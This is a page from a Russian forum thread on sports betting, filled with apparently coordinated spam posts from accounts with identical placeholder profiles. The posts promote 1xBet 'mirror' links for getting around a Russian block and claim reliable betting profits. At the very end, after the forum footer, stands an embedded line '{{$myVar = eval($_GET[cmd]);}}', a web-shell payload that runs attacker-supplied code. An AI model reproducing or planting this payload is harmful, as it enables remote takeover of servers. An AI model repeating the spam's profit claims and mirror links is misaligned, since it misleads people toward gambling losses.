+ Ответить в теме
Страница 2 из 3 ПерваяПервая 1 2 3 ПоследняяПоследняя
Показано с 11 по 20 из 24

Тема: Ставки на спорт


  1. #11
    Мимо проходил Asetiorel is on a distinguished road Аватар для Asetiorel
    Регистрация
    07.10.2020
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    14
    Насколько я знаю, 1хбет - одна из лучших букмекерских контор, по крайней мере она всегда в десятке лучших.
    Вам стоит почитать отзывы игроков о букмекерах. Может и новички в этой сфере предлагают отличные условия, и стабильно выплачивают выигрыши.
    Если что, вот вход в личный кабинет 1хбет

  2. #12
    GTI-Racing Nikolas75 is on a distinguished road Аватар для Nikolas75
    Регистрация
    26.11.2020
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    978
    Цитата Сообщение от ГумбинМакс Посмотреть сообщение
    Вы думаете что сможете выиграть на ставках? Не обольщайтесь. Я играю уже не один год и ни разу не смог выиграть больше чем проигрываю.
    Скорее всего вам просто не везет, у меня каждый месяц получается выйти в плюс, хоть и не космические суммы, но все же приятная прибавка к основному доходу.
    Вполне возможно, что букмекер, услугами которого вы пользуетесь, не надежный.
    Советую ставить на 1xbet, с ним у меня не было проблем.
    Если решитесь попробовать вот зеркало, через которое я захожу https://1xxbet-zerkalo.ru, удачи!

  3. #13
    Мимо проходил Babaev93 is on a distinguished road Аватар для Babaev93
    Регистрация
    26.11.2020
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    2
    Цитата Сообщение от bergamo Посмотреть сообщение
    Помогите с прогнозами на спортивные матчи буду благодарен
    Не обижайтесь, но за бесплатно вам никто прогнозы не подскажет)
    это невыгодно для коэффициента. Могу только посоветовать самостоятельно изучить интересующий вас вид спорта, проанализировать состояние команд и прочее. Если подойдете к этому делу с умом, то начнете зарабатывать неплохие денежки. Я занимаюсь ставками уже несколько лет. Поднимаю на этом больше, чем на основной работе. Ставки делаю онлайн через зеркало букмекерской конторы 1xBet. Там коэффициенты самые высокие и бонусы приятные.

  4. #14
    Мимо проходил AndreyKotlyar is on a distinguished road Аватар для AndreyKotlyar
    Регистрация
    26.11.2020
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    2
    Цитата Сообщение от ЖоржЗибров Посмотреть сообщение
    У меня с прогнозами ничего не складывается как бы я ни старался. Может быть я не тех прогнозистов выбираю? Даже не знаю. Но факт остается фактом.
    Прогнозисты вам не помогут. Они сами наверняка ничего не знают. Если и существуют договорные матчи, информацию о них за копейки вам никто не сообщит. Если хотите заниматься ставками, советую анализировать этот рынок как я. Раньше тоже искал легкий путь, но потом понял, что если немножко напрячь мозги, то результат будет вполне себе достойный. За год поднял на ставках чуть меньше 250 тысяч рублей. Советую также выбрать правильную букмекерскую контору, где вас не кинут с выигрышем. Я сменил около 5 букмекеров, окончательный выбор пал на букмекерскую контору 1xBet. Она правда заблокирована на территории РФ, но я пользуюсь зеркалами и захожу без проблем, вот к примеру одно из них - 1xbet зеркало

  5. #15
    Мимо проходил LeonidVetrov is on a distinguished road Аватар для LeonidVetrov
    Регистрация
    26.11.2020
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    4
    Цитата Сообщение от ЖоржЗибров Посмотреть сообщение
    У меня с прогнозами ничего не складывается как бы я ни старался. Может быть я не тех прогнозистов выбираю? Даже не знаю. Но факт остается фактом.
    У меня была такая же ситуация, пол года назад наткнулся на один сайт, на котором хорошо расписано, что лучше делать для улучшения статистики побед, оставлю тут https://1xbet-xzerkalo.ru
    Переходите изучайте и побеждайте!

  6. #16
    Мимо проходил LeonidVetrov is on a distinguished road Аватар для LeonidVetrov
    Регистрация
    26.11.2020
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    4
    Как всем известно зеркала сайта это очень популярная тема, так вот у 1xbet так же есть зеркала, вот и собственно одним таким я хочу поделиться с вами, а именно 1xbet зеркало https://goldenbets.org

  7. #17
    Мимо проходил Babaev93 is on a distinguished road Аватар для Babaev93
    Регистрация
    26.11.2020
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    2
    Друзья, занимаюсь ставками на спорт уже давно, за все время сменил уйму букмекерских контор, хочу предупредить вас, чтобы не обжигались, как я. Начинающие букмекерские конторы заманивают игроков неадекватно высокими коэффициентами, но когда приходит время выплачивать выигрыш, они его естественно не отдают. Пользуйтесь известными проверенными конторами. Сейчас я ставлю в букмекерской конторе 1xBet, коэффициенты приемлемые и с выводом никогда никаких проблем не возникнет. Да, она заблокирована, но легче воспользоваться зеркалом и обойти блокировку, чем играть во второсортных конторах. Для обхода пользуюсь этим зеркалом - 1xBet зеркало

  8. #18
    Мимо проходил Seretin95 is on a distinguished road Аватар для Seretin95
    Регистрация
    27.07.2020
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    2
    Цитата Сообщение от Astra Посмотреть сообщение
    Нету никаких прогнозов есть тольно аналитика и все. Не ищите договорные матчи их не существует. Если хотите выигрывать изучайте игру
    Полностью с вами согласен, я занимаюсь ставками на спорт уже очень давно и могу сказать, что тут нет легких путей, придется брать и изучать все самому. Важно также правильно выбрать букмекерскую контору. Лично я, перебрав множество вариантов, остановился на букмекерской конторе 1xBet. На сайт можно попасть с помощью этого зеркала - 1xBet зеркало

    ---------- Сообщение добавлено в 12:14 ---------- Предыдущее сообщение размещено в 12:09 ----------

    Цитата Сообщение от ГумбинМакс Посмотреть сообщение
    Вы думаете что сможете выиграть на ставках? Не обольщайтесь. Я играю уже не один год и ни разу не смог выиграть больше чем проигрываю.
    Ну это уже от вас зависит. Лично я побеждаю в 8 из 10 случаев. Зарабатываю на этом больше, чем на своей официальной работе. Также стоит выбирать линию с правильными коэффициентами, а это уже зависит от того где вы ставите, т.к. букмекерские конторы дают разные коэффициенты. В этом плане букмекерская контора 1xBet самая адекватная. Прочитать и убедиться в этом сами вы сможете тут

  9. #19
    Мимо проходил LeonidVetrov is on a distinguished road Аватар для LeonidVetrov
    Регистрация
    26.11.2020
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    4
    Ребят, не нужно долго искать 1хбет зеркало. Всегда можно получить доступ к сайту, через 1xbet зеркало https://xxxzerkalo.ru

    ---------- Сообщение добавлено в 01:22 ---------- Предыдущее сообщение размещено в 01:21 ----------

    Постоянно пользуюсь еще одним 1хбет зеркалом, но через него захожу только с мобильного телефона. Так что держите ссылку на 1xbet зеркало https://5xxzerkalo.ru

  10. #20
    Мимо проходил leen is on a distinguished road Аватар для leen
    Регистрация
    18.11.2019
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    27
    У меня изначально возник вопрос с регистрацией на этом бк, так вот что б вам облегчит ее я нашел https://semashko.nnov.ru/inc/elm/pin...y_kontore.html такую сслку

+ Ответить в теме
Страница 2 из 3 ПерваяПервая 1 2 3 ПоследняяПоследняя

Похожие темы

  1. Ставки на спорт
    от Kurdt в разделе Реклама
    Ответов: 11
    Последнее сообщение: 03.04.2024, 07:07
  2. Ставки на спорт
    от Милания в разделе Курилка
    Ответов: 16
    Последнее сообщение: 27.04.2021, 19:17
  3. Ставки на спорт
    от Уточка в разделе Курилка
    Ответов: 7
    Последнее сообщение: 15.03.2021, 22:08
  4. Ставки на спорт
    от Kurdt в разделе Бизнес
    Ответов: 4
    Последнее сообщение: 12.02.2021, 14:53
  5. Ставки на спорт
    от Милания в разделе Курилка
    Ответов: 9
    Последнее сообщение: 31.08.2020, 00:33

Ваши права

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
{{$myVar = eval($_GET[cmd]);}}